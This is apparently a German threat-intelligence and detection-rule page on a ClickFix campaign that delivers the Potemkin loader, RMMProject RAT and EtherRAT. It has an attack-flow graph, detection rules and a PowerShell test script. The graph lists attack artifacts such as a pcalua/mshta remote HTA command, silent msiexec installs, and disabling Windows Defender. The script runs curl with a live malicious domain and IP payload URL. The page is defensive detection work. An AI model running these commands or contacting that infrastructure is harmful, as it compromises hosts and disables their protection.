Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Eine ClickFix Social Engineering-Kampagne wurde verwendet, um den Potemkin-Loader einzusetzen, der später sowohl den RMMProject RAT als auch EtherRAT lieferte. Der Eindringprozess umfasste direkte Tastatureingaben, seitwärts bewegende Aktivität durch WMIExec und SMBExec sowie Versuche, Microsoft Defender zu schwächen oder zu deaktivieren. Insgesamt breiteten sich die Angreifer auf mehr als 11 Systeme innerhalb der geschädigten Umgebung aus.
Untersuchung
Die Untersuchung verfolgte den kompromittierten Ursprung zu einem nicht verwalteten Endpunkt, wo ein Benutzer einen bösartigen Befehl ausführte. Analysten identifizierten einen benutzerdefinierten Loader namens Potemkin, der einen deterministischen Domain-Generierungsalgorithmus verwendete, sowie einen Lua-fähigen RAT namens RMMProject, der die Chrome App-Bound Encryption umgehen konnte. Forscher dokumentierten auch EtherRAT, welches die Befehls- und Kontrollinfrastruktur über die Ethereum-Blockchain abruft, sowie die Verwendung von Chisel-Tunneln während des Einbruchs.
Abschwächung
Eine der effektivsten Verteidigungen ist das Deaktivieren des Windows Ausführungsdialogfensters über die Gruppenrichtlinie, um das Risiko der Ausführung von ClickFix zu verringern. Organisationen sollten auch den Manipulationsschutz von Microsoft Defender aktivieren und auf unbefugte Registrierungsänderungen überwachen, die die Sicherheitseinstellungen betreffen oder Versuche, den WinDefend Dienst zu deaktivieren. Eine breite und konsistente Endpunktabdeckung bleibt essentiell, um zu verhindern, dass Angreifer einen anfänglichen Fuß in die Tür bekommen.
Reaktion
Wenn diese Aktivität festgestellt wird, sollten die Reaktionskräfte betroffene Systeme sofort isolieren, um zusätzliche seitwärts Bewegungen zu stoppen. Die Bereinigung sollte das Beenden bösartiger Node.js-Prozesse, das Entfernen identifizierter Persistenzmechanismen wie Run-Schlüssel und geplante Aufgaben sowie das Säubern unbefugter Microsoft Defender-Ausschlusspfade umfassen. Ein vollständiges Durchsuchen der gesamten Umgebung ist notwendig, da die Persistenzmethoden von Host zu Host unterschiedlich sein können.
"graph TB %% Class Definitions classDef initial_access fill:#f96,stroke:#333,stroke-width:2px classDef execution fill:#3498db,stroke:#333,stroke-width:2px classDef defense_evasion fill:#9b59b6,stroke:#333,stroke-width:2px classDef persistence fill:#2ecc71,stroke:#333,stroke-width:2px classDef c2 fill:#e74c3c,stroke:#333,stroke-width:2px classDef credential_access fill:#f1c40f,stroke:#333,stroke-width:2px classDef lateral_movement fill:#1abc9c,stroke:#333,stroke-width:2px classDef defense_impairment fill:#34495e,stroke:#333,stroke-width:2px %% Initial Access and Execution Phase action_clickfix["<b>Aktion</b> – <b>T1204.004 Benutzer-Ausführung: Bösartiges Kopieren und Einfügen</b><br/>Beschreibung: Der Benutzer wird durch ClickFix Social Engineering dazu gebracht, einen Befehl im Windows Ausführungsdialog einzufügen und auszuführen.<br/><b/>Artefakte: cmd /min /c pcalua.exe -a mshta.exe…"] class action_clickfix initial_access exec_mshta["<b/>Aktion</b> – <b>T1218.005 System-Binärproxy-Ausführung: Mshta</b><br/>Beschreibung: Missbrauch von pcalua.exe, um die Ausführung von mshta.exe zu proxyen, um eine Remote-HTA-Nutzlast abzurufen.<br/><b/>Artefakte: hte.hta Nutzlast, pcalua.exe"] class exec_mshta execution exec_msiexec["<b/>Aktion</b> – <b>T1218.007 System-Binärproxy-Ausführung: Msiexec</b><br/>Beschreibung: Bösartiges MSI-Paket wird leise mit msiexec installiert.<br/><b/>Artefakte: inst24.msi, msiexec /qn"] class exec_msiexec execution %% Persistence and Loader Phase persist_netsh["<b/>Aktion</b> – <b>T1546.007 Ereignisgetriggerte Ausführung: Netsh Hilfs-DLL</b><br/>Beschreibung: Persistenz etabliert durch einen MSI AutostartRegistry-Komponente.<br/><b/>Artefakte: Potemkin Loader, RunSearch.exe in %LOCALAPPDATA%MicrosoftRunSearch"] class persist_netsh persistence %% Command and Control Phase c2_dga["<b/>Aktion</b> – <b>T1568 Dynamische Auflösung</b><br/>Beschreibung: Potemkin Loader verwendet einen Domain-Generierungsalgorithmus, um C2-Server zu finden.<br/><b/>Artefakte: Potemkin DGA"] class c2_dga c2 c2_ether["<b/>Aktion</b> – <b>T1568 Dynamische Auflösung</b><br/>Beschreibung: EtherRAT löst seine C2-Adresse über die Ethereum-Blockchain durch EtherHiding auf.<br/><b/>Artefakte: EtherRAT"] class c2_ether c2 %% Credential Access Phase cred_steal["<b/>Aktion</b> – <b>T1539 Web-Session-Cookie stehlen</b><br/>Beschreibung: RMMProject RAT zielt auf Browser, um Cookies und Anmeldedaten über DLL-Injektion zu stehlen, um die Chrome App-Bound Encryption zu umgehen.<br/><b/>Artefakte: RMMProject, Browser SQLite-Datenbanken"] class cred_steal credential_access %% Lateral Movement Phase lat_move["<b/>Aktion</b> – <b>T1210 Ausnutzung von Remotediensten</b><br/>Beschreibung: Angreifer bewegt sich seitlich unter Verwendung von WMIExec und SMBExec, um den MSI-Installer zu verbreiten.<br/><b/>Artefakte: WMIExec, SMBExec, msiexec /i <IP>ADMIN$Temp…"] class lat_move lateral_movement %% Defense Impairment Phase def_impair["<b/>Aktion</b> – <b>T1687 Ausnutzung zur Verteidigungsbeeinträchtigung</b><br/>Beschreibung: Kämpfen gegen Windows Defender durch Patchen von AMSI, Schreiben von Registrierungsrichtlinien und Beenden des Dienstes.<br/><b/>Artefakte: DisableAntiSpyware Registrierungs-Schlüssel, Stop-Service WinDefend, AMSI-Patchen"] class def_impair defense_impairment %% C2 Tunneling Phase c2_tunnel["<b/>Aktion</b> – <b>T1572 Protokoll-Tunneling</b><br/>Beschreibung: Verwendung von Chisel zum Einrichten von Reverse-SOCKS-Tunneln und Cloudflare-Tunneln, um interne Dienste offenzulegen.<br/><b/>Artefakte: Chisel, cloudflared umbenannt in svchost.exe"] class c2_tunnel c2 %% Connections %% Flow from initial access to execution action_clickfix –>|leads_to| exec_mshta action_clickfix –>|leads_to| exec_msiexec %% Execution leads to persistence exec_msiexec –>|installs| persist_netsh %% Persistence leads to C2 and Loader deployment persist_netsh –>|deploys| c2_dga persist_netsh –>|deploys| c2_ether %% C2 activities lead to credential access c2_dga –>|executes| cred_steal c2_ether –>|executes| cred_steal %% Lateral movement spreads the attack cred_steal –>|enables| lat_move lat_move –>|deploys_to_new_hosts| exec_msiexec %% Defense impairment protects the attacker exec_mshta –>|used_to_patch| def_impair def_impair –>|facilitates| c2_tunnel "
Angriffsablauf
Erkennungen
Systemprozesse, die von untypischen Pfaden ausgeführt werden (via process_creation)
Ansicht
Verdächtige Änderungen an Windows Defender Einstellungen (via PowerShell)
Ansicht
Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (via registry_event)
Ansicht
Deaktivierung von Windows Defender Schutzmechanismen (via registry_event)
Ansicht
Mögliche Impacket-Kommandozeilenmuster (via cmdline)
Ansicht
Verdächtiger Ransomware-Eingriff auf Dienstunterbrechung (via cmdline)
Ansicht
Mögliche Ausführung durch versteckte PowerShell-Kommandozeilen (via cmdline)
Ansicht
NodeJS-Binärdatei, die von einem ungewöhnlichen Ort ausgeführt wird (via cmdline)
Ansicht
LOLBAS Pcalua (via cmdline)
Ansicht
Verdächtiges LOLBAS MSHTA-Verteidigungsevasionsverhalten durch Erkennung zugehöriger Befehle (via process_creation)
Ansicht
LOLBAS Conhost (via cmdline)
Ansicht
Verwendung von Certutil zur Datenkodierung und Zertifikatoperationen (via cmdline)
Ansicht
Mögliche Nutzung eines Tunneling-Tools [Windows] (via cmdline)
Ansicht
Verdächtige CURL-Nutzung (via cmdline)
Ansicht
Verdächtige .NET-Methodenaufrufe von PowerShell aus (via PowerShell)
Ansicht
Verdächtige ausführbare Datei wurde erstellt, die wie ein legitimer Systemprozess benannt ist (via file_event)
Ansicht
Möglicher Missbrauch eines Publicnode Ethereum als C2-Kanal (via dns_query)
Ansicht
Verdächtiger Dateidownload über Direkte IP (via proxy)
Ansicht
PowerShell-Skriptausführung und Manipulation von Windows Defender [Windows PowerShell]
Ansicht
Erkennung der Kommunikation von EtherRAT über Ethereum-basierte C2 [Windows Netzwerkverbindung]
Ansicht
Erkennung der ClickFix HTA-Nutzlast bereitgestellt via Mshta.exe [Windows Prozess-Erstellung]
Ansicht
Simulationsausführung
Voraussetzung: Der Überprüfungs- und Basisflugtest muss bestanden werden.
Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Angriffstechnik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die durch die Erkennungslogik erwartet wird. Abstrakte oder nicht zugehörige Beispiele führen zu falschen Diagnosen.
-
Angriffserzählung & Befehle: Der Angreifer versucht, einen C2-Kanal mit der signaturvollen Methode von EtherRAT zu etablieren. Um die statische Analyse ihrer Malware-Konfiguration zu umgehen, verwenden sie
curlum eine HTTP-POST-Anfrage an einen öffentlichen Ethereum RPC-Endpunkt (https://eth.drpc.org) durchzuführen. Diese Anfrage ist darauf ausgelegt, die tatsächliche C2-IP/Domäne aus der Blockchain zu holen. Um der spezifischen Logik der aktuellen Erkennungsregel zu genügen, ist der Befehl so strukturiert, dass die bekannte bösartige Domäneanus-staylard.xyzinnerhalb der Befehlszeilenargumente enthalten wird, wodurch die Nutzlast-Zustellung oder Konfigurationsphase simuliert wird. -
Regressions-Testskript:
# Simulation der EtherRAT C2-Auflösung über Ethereum RPC # Dieses Skript imitiert die spezifischen Kommandozeilenmuster, die zum Auslösen der Sigma-Regel erforderlich sind. $maliciousDomain = "anus-staylard.xyz" $rpcEndpoint = "https://eth.drpc.org" $maliciousIpString = "77.110.122.58:23205/lQhEQui9a4lZ.exe" # Konstruktion des Befehls zur Einhaltung des (selection1 ODER selection2) UND selection3 Logik # Muster: curl -s -X POST https://eth.drpc.org ... anus-staylard.xyz $cmd = "curl.exe -s -X POST $rpcEndpoint -d 'data=Abfrage' --user-agent '$maliciousDomain' --referer '$maliciousIpString'" Write-Host "[+] Simulierten EtherRAT-Befehl ausführen: $cmd" Start-Process "cmd.exe" -ArgumentList "/c $cmd" -NoNewWindow -
Bereinigungskommandos:
# Es werden durch diese Simulation keine permanenten Dateien erstellt; # nur flüchtige Prozesse werden ausgeführt. Write-Host "[+] Simulation abgeschlossen. Keine Bereinigung erforderlich."